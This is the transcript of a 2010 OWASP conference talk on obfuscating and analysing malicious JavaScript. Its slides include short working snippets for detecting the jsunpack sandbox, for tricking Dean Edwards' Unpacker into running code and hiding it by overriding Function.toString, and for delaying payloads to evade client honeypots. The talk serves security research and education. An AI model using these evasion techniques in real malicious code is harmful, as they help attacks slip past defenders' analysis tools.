creating, obfuscating and analyzing malware javascript
DESCRIPTION
Malware attacks on unaware Internet users' browsers are becoming more and more common. New techniques for bypassing filters used by security vendors emerge. In turn, the filters are getting better, new analyzing tools are developed - the war continues. At the presentation you will learn how crackers are trying to hamper the work of security engineers, and how reversers are overcoming those problems. Emphasis will be placed on the weaknesses of automated tools - we'll try to avoid detection by jsunpack and Capture-HPC, we'll also trick Dean Edwards' Unpacker.TRANSCRIPT
Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License.
The OWASP Foundation
OWASP
http://www.owasp.org
Creating, obfuscating and analyzing malware JavaScript
Krzysztof Kotowicz
PHP Developer
http://web.eskot.pl
Medycyna Praktyczna
June 2010
OWASP 2
Plan
Theory - Obfuscation and analysis
in general
in JavaScript
Practice - evading automatic code analyzers
jsunpack
JavaScript unpacker
Capture-HPC
OWASP
Theory
OWASP 4
Obfuscation
Goal - make analysis harder
OWASP 5
Obfuscation
There is no perfect obfuscation [cs.princeton.edu]
Analysis as debugging
Debugging is twice as hard as writing a program in the first place. So if you're as clever as you can be when you write it, how will you ever debug it? Brian Kernighan, The Elements of Programming Style
OWASP 6
Obfuscation methods
for while + if
Iteration recursion
Complex logical tests
Dummy code branches
Quasitautologies [blog.didierstevens.com]
Enigmatic variable names
OWASP 7
Obfuscation methods in JS
JavaScript is a dynamic and functional language
Code created at runtime – eval
String.fromCharCode, unescape
Regular expressions - String.replace
Packers, e.g. [dean.edwards.name]
[developer.yahoo.com]
[malwareguru.org]
[closure-compiler.appspot.com]
Others - e.g. WhiteSpace Obfuscation [ktcorpsecurity.com]
OWASP 8
Active defense against analysis
Function.toString / arguments.callee.toString [isc.sans.org]
autoencryption [isc.sans.org]
browser detection
DOM
window, navigator
timings
cookies
mouse position, screen resolution
Malware served only once per IP [research.zscaler.com]
OWASP 9
Active defense - know thy language
function is_even(n) { var parameter_is_even = (n % 2) == 0 ? true : false; return parameter_is_even; } alert(is_even(16));
OWASP 10
Result
OWASP 11
How to analyze malware JavaScript?
Know JavaScript!
Run the code & observe effects in a controlled environment
Overload functions
eval
String.fromCharCode
Deobfuscate parts of code
Be patient and creative
OWASP 12
JavaScript analysis...
Is rather heuristics than algorithm
Is rather manual than automatic
Human is required
Tools help greatly, but they're not perfect
OWASP
Practice
OWASP 14
jsunpack
Runs JS inside SpiderMonkey [mozilla.org]
JS fetched from URL, PCAP, JS/HTML file…
SM is modified to include:
DOM emulation
browser objects emulation
onload() event
monitors eval(), setTimeout() and
others
scans the code using signatures file
OWASP 15
jsunpack - weak points
Emulates browser
Code that won't run (dead branches) will be checked with signatures only
OWASP 16
Evading detection
We need to detect being run in jsunpack
if (fake_browser) { do_no_harm(); } else { redirect_to_malicious_website(); // or obfuscate an exploit }
OWASP 17
How to detect jsunpack?
Many, many ways:
Bad implementation of window.location
window.location.host = ścieżka do pliku
It adds its own global variables
fake_browser = window.location.host.match('/');
fake_browser = (typeof my_location != "undefined"); // my_navigator, my_activex, my_element, // the_activex, app, ...
OWASP 18
How to detect jsunpack?
It overloads some functions
Objects emulation has missing spots
fake_browser = (typeof PluginArray.prototype.refresh == "undefined"); fake_browser = (document.title == 'My Title');
fake_browser = (window.open.toString().match(/print/)); fake_browser = (alert.toString().match(/{\s*}/));
OWASP 19
Jsunpack - bonus
jsunpack runs not only JavaScript
Code will be run in jsunpack, but not in browsers
<script type="text/dummy"> // good enough for jsunpack </script>
OWASP 20
DEMO 1
github.com/koto/owasp-malicious-javascript/
index.php / js.js - sandbox detection
(modify js.js to test different techniques)
jekyll2.html - Dr Jekyll attack
js.js - HTML hack
(shortest jsunpack disabler)
Note to online viewers:
Demos require checking and running the files locally - see attached docs
OWASP 21
jsunpack - summary
You could easily detect being run in jsunpack sandbox
When detected, you just skip doing bad stuff
If malware code is obfuscated, it will not be detected with signatures
You go under the radar of jsunpack analysis
OWASP 22
Dean Edwards' Unpacker
A JavaScript Decompressor [dean.edwards.name]
Reverses Dean Edward's packer
Packer works like this:
eval(function(p,a,c,k,e,r){/*code*/}(para, meters)) /* which is the same as */ var packer = function(p,a,c,k,e,r) {/**/}; var s = packer(para,meters); eval(s);
OWASP 23
Unpacker - step 1
Replace eval() with string assignment
value holds decompressed code
// packed code is in input var input="eval(function(p,a,c,k...."; eval("var value=String" + input.slice(4)); // cut "eval" // executed code will be: var value=String(function(p,a,c,k..);
OWASP 24
Unpacker - step 1
Replace eval() with string assignment
value holds decompressed code
But! we're blindly executing cut&pasted code!
// packed code is in input var input="eval(function(p,a,c,k...."; eval("var value=String" + input.slice(4)); // cut "eval" // executed code will be: var value=String(function(p,a,c,k..);
OWASP 25
Unpacker - step 2
Use Function.toString() to display the code
Unpacked code WILL NOT RUN, it wil just print!
Disclaimer - the real code is a bit different, but the concept is the same
eval( "var unpacked = function() {" + value + "}" ); alert(unpacked.toString());
OWASP 26
Dean Edwards Unpacker - weak points
Concatenating strings and executing the resulting code (injection, anyone?)
Using a constant - we cut first 4 characters without looking at them
eval() without any validation
Depends on Function.toString() to print the code
OWASP 27
Dean Edwards Unpacker - disarming
eval() uses a single parameter
String() uses a single parameter
...but you could give more :)
Arbitrary code execution without changing p,a,c,k,e,r function!
eval("code"); eval("code", "ignored"); eval("code", malicious()); String("code", malicious());
OWASP 28
Dean Edwards Unpacker - disarming
malicious() will execute in packed code
and in unpacker
eval(function(p,a,c,k,e,r){...}(para,meters),malicious()); var value=String(function(p,a,c,k,e,r){...}(para,meters),malicious());
OWASP 29
Dean Edwards Unpacker - disarming
What can we do in malicious()?
Unpacker uses Function.toString()
Let's override it!
malicious() is e.g. obfuscated:
Function.prototype.toString = function() { return 'harmless code'; }
OWASP 30
DEMO 2
github.com/koto/owasp-malicious-javascript/
demo2/evil.packed.js
OWASP 31
Dean Edwards Unpacker - point of concept
OWASP 32
High interaction client honeypots
Capture-HPC [projects.honeynet.org] as an example
Code is run in real browser in a virtual machine
Server serves URL list to visit
Client starts browsers and waits…
Code side-effects are monitored
Filesystem
Registry
Processes
If anything suspicious happens with the system, URL is reported to server as a malware
OWASP 33
High interaction client honeypots
Runtime environment is the same
There is no emulation
Could we detect we're traced?
OWASP 34
Weak point
OWASP 35
High interaction client honeypots - robot
Doesn't move mouse
Doesn't click
Doesn't drag
Doesn't navigate
Is "stupid"
OWASP 36
High interaction client honeypots - user
Moves mouse
Clicks
Drags
Navigates
Is stupid
OWASP 37
Honeypots – social engineering
OWASP 38
Honeypots – social engineering
OWASP 39
Honeypots - summary
No emulation layer to detect
Code is run in real browser
Weakest point is the lack of human element
Just run the code after detecting an interaction with the page
OWASP 40
Summary
Obfuscation can only make analysis slower
Code can actively defend against analysis
Human is required to do a complete analysis
Analysis requires strong skills
Automatic tools can be fooled
detect emulation differences
errors
lack of full interaction with a webpage
OWASP 41
Links Demo source: github.com/koto/owasp-malicious-javascript
Tools
jsunpack.blogspot.com
dean.edwards.name/unpacker/
projects.honeynet.org/capture-hpc
malzilla.sourceforge.net
Obfuscation and analysis
isc.sans.org/diary.html
www.malwareguru.org
delicious.com/koto/obfuscation
closure-compiler.appspot.com
JavaScript
www.slideshare.net/ferrantes/just-advanced-javascript
jsninja.com
[email protected] http://blog.kotowicz.net